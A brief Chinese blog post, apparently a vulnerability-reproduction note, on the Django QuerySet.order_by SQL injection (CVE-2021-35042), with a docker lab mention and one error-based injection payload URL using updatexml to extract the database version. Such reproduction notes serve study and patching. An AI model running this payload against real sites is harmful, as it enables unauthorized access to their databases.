漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
BD_Marathon2 天前
SQL学习指南——视图2601_962072552 天前
李梦娇常识4600问|题库|打印版HackTwoHub2 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人Volunteer Technology2 天前
Flink Table API与SQL(一)持敬chijing2 天前
Web渗透之SQL注入-常用sql语句Theo·Chan2 天前
更换 Kingbase V9 License 踩坑记伶俜662 天前
鸿蒙原生应用实战(十八)ArkUI 记账本:SQLite 账单 + 图表统计 + 分类管理码云骑士2 天前
31-慢查询排查全流程(上)-Django-Debug-Toolbar与EXPLAIN入门龙腾AI白云2 天前
数字孪生和世界模型,二者的技术边界正在慢慢融合吗?yangshicong2 天前
第16章:AI数据分析与Text-to-SQL